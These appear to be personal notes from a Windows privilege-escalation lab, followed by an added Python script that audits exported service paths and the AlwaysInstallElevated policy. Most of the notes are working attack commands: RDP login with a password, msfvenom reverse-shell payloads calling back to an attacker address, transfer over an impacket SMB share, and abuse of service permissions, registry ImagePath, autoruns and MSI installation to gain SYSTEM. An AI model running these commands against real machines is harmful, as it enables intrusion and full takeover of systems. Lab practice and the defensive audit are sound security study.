initial access with xfreerdp
xfreerdp3 /u:user /p:password321 /cert:ignore /v:10.201.8.171

payload generation with msfvenom and transfer with impacket
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.110.172 LPORT=1337 -f exe -o rev.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.110.172 LPORT=1337 -f msi -o rev.msi
smbserver.py root .
copy \\10.14.110.172\root\rev.exe C:\PrivEsc\rev.exe
copy \\10.14.110.172\root\rev.msi C:\PrivEsc\rev.msi

service exploits
insecure service perms
sc config filepermsvc binpath= "\"C:\PrivEsc\rev.exe\""

Unquoted service path
accesschk.exe -quvwd "C:\Program Files\Unquoted Path Service"

weak registry perms
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\rev.exe /f

insecure service executables
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

registry
Autoruns
copy C:\PrivEsc\rev.exe "C:\Program Files\Autorun Program\program.exe" /Y

AlwaysInstallElevated
msiexec /quiet /qn /i C:\PrivEsc\rev.msi
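
A defender-side check for two of the misconfigurations listed above (unquoted service path, AlwaysInstallElevated), as an added example that is not part of the original notes. It audits ImagePath and policy values that have already been exported; the service names, svc.exe, the policy values and all function names are constructed for illustration.

```python
import re

# Constructed sample data: service names and svc.exe are made up; the two
# directories come from the commands in these notes.
SERVICES = {
    "example-unquoted": r"C:\Program Files\Unquoted Path Service\svc.exe -run",
    "example-quoted": r'"C:\Program Files\File Permissions Service\filepermservice.exe"',
    "example-nospace": r"C:\Windows\System32\svchost.exe -k netsvcs",
}
# Constructed values of SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated per hive.
POLICY = {"HKLM": 1, "HKCU": 1}
_EXE = re.compile(r"(.+?\.exe)(?=\s|$)(.*)", re.IGNORECASE)


def split_image_path(image_path):
    """Return (executable, arguments, was_quoted), or None if unparseable."""
    value = image_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return None if end == -1 else (value[1:end], value[end + 1:].strip(), True)
    match = _EXE.match(value)
    return (match.group(1), match.group(2).strip(), False) if match else None


def quoted_fix(image_path):
    """Return the corrected ImagePath for an unquoted path with spaces, else None."""
    parsed = split_image_path(image_path)
    if parsed is None or parsed[2] or " " not in parsed[0]:
        return None
    exe, args, _ = parsed
    return f'"{exe}"' + (f" {args}" if args else "")


def always_install_elevated(policy):
    """The MSI policy only takes effect when it is set to 1 in both hives."""
    return policy.get("HKLM") == 1 and policy.get("HKCU") == 1


def audit(services, policy):
    """Return (name, issue, remediation) tuples for every finding."""
    findings = [(name, "unquoted-path", fix)
                for name, path in sorted(services.items())
                if (fix := quoted_fix(path))]
    if always_install_elevated(policy):
        findings.append(("msi-policy", "AlwaysInstallElevated", "disable in both hives"))
    return findings
```

The weak-permission cases (service ACLs, registry key ACLs, writable executables and autorun targets) still need an ACL review such as the accesschk commands above; this check only covers values that can be judged from their content.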